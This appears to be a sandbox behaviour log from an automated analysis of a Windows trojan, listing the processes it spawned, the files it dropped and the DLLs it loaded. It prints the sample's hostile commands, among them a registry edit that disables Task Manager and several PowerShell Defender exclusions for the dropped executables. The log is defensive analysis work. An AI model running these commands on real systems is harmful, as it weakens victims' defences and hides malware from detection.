                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_00046FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00046FAA
                                    Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAF0BE530_2_00007FFD9BAF0BE5
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAF8A9230_2_00007FFD9BAF8A92
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAB0D2631_2_00007FFD9BAB0D26
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAB14CB31_2_00007FFD9BAB14CB
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAA0D4C31_2_00007FFD9BAA0D4C
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAA0E4331_2_00007FFD9BAA0E43
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAD0C3331_2_00007FFD9BAD0C33
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAD8A9231_2_00007FFD9BAD8A92
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 32_2_00007FFD9BA90D4C32_2_00007FFD9BA90D4C
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 32_2_00007FFD9BA90E4332_2_00007FFD9BA90E43
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeCode function: 50_2_00007FFD9BAA0D4C50_2_00007FFD9BAA0D4C
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeCode function: 50_2_00007FFD9BAA0E4350_2_00007FFD9BAA0E43
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\CjxtNgkC.log B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: String function: 0005F5F0 appears 31 times
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: String function: 0005EC50 appears 56 times
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: String function: 0005EB78 appears 39 times
Source: PbfYaIvR5B.exe, 00000000.00000003.1692775271.00000000031FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs PbfYaIvR5B.exe
Source: PbfYaIvR5B.exe, 00000000.00000003.1692775271.00000000031FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs PbfYaIvR5B.exe
Source: PbfYaIvR5B.exe, 00000000.00000003.1693125546.00000000031FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs PbfYaIvR5B.exe
Source: PbfYaIvR5B.exe, 00000000.00000003.1693125546.00000000031FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs PbfYaIvR5B.exe
Source: PbfYaIvR5B.exe, 00000000.00000002.1693797213.00000000031FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs PbfYaIvR5B.exe
Source: PbfYaIvR5B.exe, 00000000.00000002.1693797213.00000000031FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs PbfYaIvR5B.exe
Source: PbfYaIvR5B.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: MsPortSavesruntime.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AvdGjRxbXYfvkpkpztF.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AvdGjRxbXYfvkpkpztF.exe0.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Idle.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AvdGjRxbXYfvkpkpztF.exe1.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@46/68@3/4
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_00046C74 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Users\user\Desktop\MaBbbrQq.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe Mutant created: NULL
Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-Q4pXu1jRvCFsiermVNTU
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Users\user\AppData\Local\Temp\rfrVTonxuC
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Command line argument: sfxname (0_2_0005DF1E)
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Command line argument: sfxstime (0_2_0005DF1E)
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Command line argument: STARTDLG (0_2_0005DF1E)
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Command line argument: xz (0_2_0005DF1E)
Source: PbfYaIvR5B.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PbfYaIvR5B.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\webHostnet\MsPortSavesruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PbfYaIvR5B.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe File read: C:\Users\user\Desktop\PbfYaIvR5B.exe
Source: unknown Process created: C:\Users\user\Desktop\PbfYaIvR5B.exe "C:\Users\user\Desktop\PbfYaIvR5B.exe"
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\webHostnet\MsPortSavesruntime.exe "C:\webHostnet/MsPortSavesruntime.exe"
Source: unknown Process created: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Source: unknown Process created: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Source: unknown Process created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
Source: unknown Process created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
Source: unknown Process created: C:\webHostnet\MsPortSavesruntime.exe C:\webHostnet\MsPortSavesruntime.exe
Source: unknown Process created: C:\webHostnet\MsPortSavesruntime.exe C:\webHostnet\MsPortSavesruntime.exe
Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'
Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: version.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: sspicli.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mscoree.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: kernel.appcore.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: version.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: uxtheme.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windows.storage.dll
